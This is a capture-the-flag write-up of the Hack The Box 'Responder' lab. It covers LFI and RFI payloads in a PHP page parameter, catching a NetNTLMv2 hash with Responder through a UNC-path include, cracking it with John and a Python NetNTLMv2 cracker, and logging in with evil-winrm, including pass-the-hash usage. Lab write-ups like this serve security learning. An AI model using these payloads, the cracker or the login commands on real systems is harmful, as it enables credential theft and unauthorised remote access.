
HTB-Responder machine walkthrough

Task1

When visiting the web service using the IP address, what is the domain that we are being redirected to?

Opening the target's IP address in a browser, we are redirected to a hostname instead of being served directly:

unika.htb

Task2

Which scripting language is being used on the server to generate webpages?

The question is which scripting language generates the pages. An nmap service scan of the web port (nmap -sV against port 80) is enough to reveal it: the scan identifies the server as running PHP.

Task3

What is the name of the URL parameter which is used to load different language versions of the webpage?

The question asks for the name of the URL parameter that selects the language version of the page. Click into any of the language links and look at the query string in the address bar; the parameter is:

page

Task4

Which of the following values for the page parameter would be an example of exploiting a Local File Include (LFI) vulnerability: "french.html", "//10.10.14.6/somefile", "../../../../../../../../windows/system32/drivers/etc/hosts", "minikatz.exe"

Of the four options, the one that is a Local File Include is obviously the third: it climbs out of the web root with repeated ../ segments to reach a file on the server's own disk.

../../../../../../../../windows/system32/drivers/etc/hosts

Task5

Which of the following values for the page parameter would be an example of exploiting a Remote File Include (RFI) vulnerability: "french.html", "//10.10.14.6/somefile", "../../../../../../../../windows/system32/drivers/etc/hosts", "minikatz.exe"

This one asks about Remote File Include, so the answer is the value that points at another host (the one containing an IP address, which on Windows is a UNC path //host/share):

//10.10.14.6/somefile
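To make the difference between the four values concrete, here is an added Python example (written for this write-up, not code from the box or from HTB). It models what a naive include($_GET['page']) effectively opens, labels each candidate the way Tasks 4 and 5 do, and shows a hardened lookup (allowlist plus a containment check). The web root /var/www/html and the allowlist entries are constructed; only french.html is known from the task, english.html is an assumed extra entry.

```python
import posixpath

# Constructed web root; the real one on the box is not known from the write-up.
WEB_ROOT = "/var/www/html"

# Constructed allowlist of language pages. "french.html" appears in the task;
# "english.html" is an assumed extra entry.
ALLOWED_PAGES = {"french.html", "english.html"}

# The four candidate values from Tasks 4 and 5, verbatim.
CANDIDATES = [
    "french.html",
    "//10.10.14.6/somefile",
    "../../../../../../../../windows/system32/drivers/etc/hosts",
    "minikatz.exe",
]


def resolve_unsafe(page: str) -> str:
    """Path that a naive include(WEB_ROOT . '/' . $page) effectively opens.

    posixpath.join drops the web root as soon as the value is absolute
    (anything starting with '/'), and normpath happily walks '..' upward,
    discarding the extra '..' once it reaches the filesystem root.
    """
    return posixpath.normpath(posixpath.join(WEB_ROOT, page))


def classify(page: str) -> str:
    """Label a page value: include that points at another host (RFI),
    local include that escapes the web root (LFI), or a plain file name."""
    if page.startswith("//") or "://" in page:
        # '//host/share' is a UNC path on Windows, so PHP's include() opens an
        # SMB connection to that host; 'scheme://' relies on PHP URL wrappers.
        return "RFI"
    if not resolve_unsafe(page).startswith(WEB_ROOT + "/"):
        return "LFI"
    return "local"


def resolve_safe(page: str):
    """Hardened lookup: exact allowlist match first, then a containment check
    as defence in depth. Returns the path to include, or None to refuse."""
    if page not in ALLOWED_PAGES:
        return None
    target = posixpath.normpath(posixpath.join(WEB_ROOT, page))
    if posixpath.commonpath([WEB_ROOT, target]) != WEB_ROOT:
        return None
    return target


if __name__ == "__main__":
    for value in CANDIDATES:
        print(f"{value!r:65} {classify(value):6} unsafe -> {resolve_unsafe(value)}"
              f"  safe -> {resolve_safe(value)}")
```

Running the block prints one line per candidate: the traversal value resolves to /windows/system32/drivers/etc/hosts under the naive scheme, the //10.10.14.6 value leaves the web root entirely, and the hardened resolver refuses everything except the allowlisted name.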

Task6

What does NTLM stand for?

NTLM is Microsoft's challenge/response authentication protocol suite; the acronym expands to:

New Technology LAN Manager

Task7

Which flag do we use in the Responder utility to specify the network interface?

The question asks which flag tells Responder which network interface to use.

First install the Responder tool:

sudo apt install responder -y

The default mirror timed out for me, so I switched to another mirror by adding these lines to /etc/apt/sources.list:

deb http://mirrors.aliyun.com/kali kali-rolling main non-free non-free-firmware contrib
deb-src http://mirrors.aliyun.com/kali kali-rolling main non-free non-free-firmware contrib

Once Responder is installed, run responder --help and look through the options. The interface is selected with -I (uppercase i):

-I

Task8

There are several tools that take a NetNTLMv2 challenge/response and try millions of passwords to see if any of them generate the same response. One such tool is often referred to as john, but the full name is what?.

The question asks for john's full name:

John the Ripper

Task9

What is the password for the administrator user?

The question asks for the administrator's password.

I wanted to do this from WSL; most write-ups online use Kali directly. WSL needs a little extra setup here: because the site redirects to unika.htb, /etc/hosts has to be edited so that the hostname resolves to the target. The left column holds the target machine's IP, the right column the hostname it redirects to (unika.htb). After that, browsing to the site shows the real page content.

Now use the file inclusion vulnerability in the page parameter for a remote file include: set page to a UNC-style path pointing at our own machine (//<attacker IP>/somefile) while Responder listens on that machine. On Windows, PHP's include() treats //host/share as a UNC path, so the web server opens an SMB connection to us and tries to authenticate with NTLM. Responder plays the server side of that handshake and logs the NetNTLMv2 challenge/response of the account the web server runs as, which here is Administrator.

In the Responder output we see the captured NetNTLMv2 hash for administrator. Feed it to john (Task 8) with a wordlist to recover the password.

The cracked password is badminton.
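To show what the tool from Task 8 actually does with the capture from Task 9, here is an added Python example written for this post (not code from Responder or John the Ripper). It recomputes the NetNTLMv2 response for each candidate password and compares it with the NTProofStr field in a Responder-style line user::domain:challenge:proof:blob. MD4 is implemented in pure Python because hashlib's md4 is often disabled under OpenSSL 3. The capture line it builds is constructed from a known password: the domain name RESPONDER, the server challenge and the blob contents are made-up test values, not data from the box.

```python
import hashlib
import hmac
import struct

MASK32 = 0xFFFFFFFF


def _rotl(x: int, n: int) -> int:
    return ((x << n) | (x >> (32 - n))) & MASK32


def md4(data: bytes) -> bytes:
    """Pure-Python MD4 (RFC 1320). The NT hash is MD4 of the UTF-16LE password."""
    msg = bytearray(data) + b"\x80"
    while len(msg) % 64 != 56:
        msg += b"\x00"
    msg += struct.pack("<Q", (8 * len(data)) & 0xFFFFFFFFFFFFFFFF)
    state = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    # Message-word order for rounds 2 and 3, and the per-round shift tables.
    k2 = [0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15]
    k3 = [0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15]
    shifts = [(3, 7, 11, 19), (3, 5, 9, 13), (3, 9, 11, 15)]
    for off in range(0, len(msg), 64):
        X = struct.unpack("<16I", bytes(msg[off:off + 64]))
        v = list(state)
        for i in range(48):
            rnd, t = i // 16, (-i) % 4          # t: index of the word being updated
            x, y, z = v[(t + 1) % 4], v[(t + 2) % 4], v[(t + 3) % 4]
            if rnd == 0:
                f, k, add = (x & y) | (~x & z), i, 0
            elif rnd == 1:
                f, k, add = (x & y) | (x & z) | (y & z), k2[i - 16], 0x5A827999
            else:
                f, k, add = x ^ y ^ z, k3[i - 32], 0x6ED9EBA1
            v[t] = _rotl((v[t] + f + X[k] + add) & MASK32, shifts[rnd][i % 4])
        state = [(s + w) & MASK32 for s, w in zip(state, v)]
    return struct.pack("<4I", *state)


def nt_hash(password: str) -> bytes:
    return md4(password.encode("utf-16-le"))


def ntlmv2_proof(password: str, user: str, domain: str,
                 server_challenge: bytes, blob: bytes) -> bytes:
    """NTProofStr = HMAC-MD5(NTLMv2-key, server_challenge || blob), where
    NTLMv2-key = HMAC-MD5(NT-hash, UTF-16LE(upper(user) || domain))."""
    v2_key = hmac.new(nt_hash(password),
                      (user.upper() + domain).encode("utf-16-le"),
                      hashlib.md5).digest()
    return hmac.new(v2_key, server_challenge + blob, hashlib.md5).digest()


def parse_capture(line: str):
    """Split Responder's NetNTLMv2 line user::domain:challenge:proof:blob (hex fields)."""
    user, _, domain, chal, proof, blob = line.strip().split(":")
    return user, domain, bytes.fromhex(chal), bytes.fromhex(proof), bytes.fromhex(blob)


def crack(line: str, wordlist):
    """What john's netntlmv2 format does: recompute the proof for every
    candidate password and return the first one that matches, else None."""
    user, domain, chal, proof, blob = parse_capture(line)
    for pw in wordlist:
        if hmac.compare_digest(ntlmv2_proof(pw, user, domain, chal, blob), proof):
            return pw
    return None


def make_capture(user: str, domain: str, password: str,
                 server_challenge: bytes = bytes.fromhex("1122334455667788")) -> str:
    """Build a constructed capture line for a known password (test input only;
    the challenge and blob contents are invented, not taken from the box)."""
    blob = (b"\x01\x01" + b"\x00" * 6              # NTLMv2 client-challenge header
            + b"\x00" * 8                          # timestamp (zeroed for the test)
            + bytes.fromhex("0011223344556677")    # client nonce (constructed)
            + b"\x00" * 4                          # reserved
            + b"\x00" * 4                          # empty AV_PAIR list terminator
            + b"\x00" * 4)
    proof = ntlmv2_proof(password, user, domain, server_challenge, blob)
    return f"{user}::{domain}:{server_challenge.hex()}:{proof.hex()}:{blob.hex()}"


if __name__ == "__main__":
    # Constructed capture: domain RESPONDER and the password are assumed values.
    capture = make_capture("Administrator", "RESPONDER", "badminton")
    print(capture)
    print("cracked:", crack(capture, ["123456", "password", "badminton"]))
```

Two things the example makes visible: the user name is upper-cased before it enters the NTLMv2 key while the domain is used as sent, and the server challenge is bound into the response, which is why a captured NetNTLMv2 value can be cracked offline but not replayed to a different server.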

Task10

We'll use a Windows service (i.e. running on the box) to remotely access the Responder machine using the password we recovered. What port TCP does it listen on?

The question asks which TCP port that service listens on. An nmap scan shows WinRM (Windows Remote Management over HTTP) open on:

5985

Submit Root flag

With the username and password recovered in Task 9, connect with evil-winrm and read the flag:

evil-winrm -i IP -u administrator -p badminton

Summary

Responder

Responder is an internal-network tool that impersonates various servers on a LAN in order to capture authentication attempts.

In this box we only used its listening mode:

Responder -I tun0 listens on the tun0 interface.

Why tun0? Because that is the interface the OpenVPN connection to the lab uses (the profile names it explicitly); confirm with ip a, and substitute whatever interface actually carries the traffic in your own setup.

While listening, it waits for the target to connect and send an NTLM authentication; Responder acts as the server, supplies the challenge, receives the response and logs the resulting NetNTLMv2 hash.

Evil-WinRM

Evil-WinRM is an open-source penetration-testing tool that provides a simple, effective way to automate tasks and run complex commands on remote Windows machines over WinRM.

It works here because nmap showed 5985 (WinRM) open, and WinRM accepts NTLM authentication, so the cracked credentials log us straight into the system.

On this box the usage is evil-winrm -i IP -u administrator -p password. It can also authenticate with a hash instead of a password (pass-the-hash):

evil-winrm -i IP -u administrator -H hash

Note that -H expects the NT hash of the password (the MD4 value stored on the box), not the NetNTLMv2 challenge/response that Responder captured; that response is bound to the server challenge and cannot be replayed this way, which is why it had to be cracked first. In practice evil-winrm plays the role ssh does on Linux: an interactive remote shell.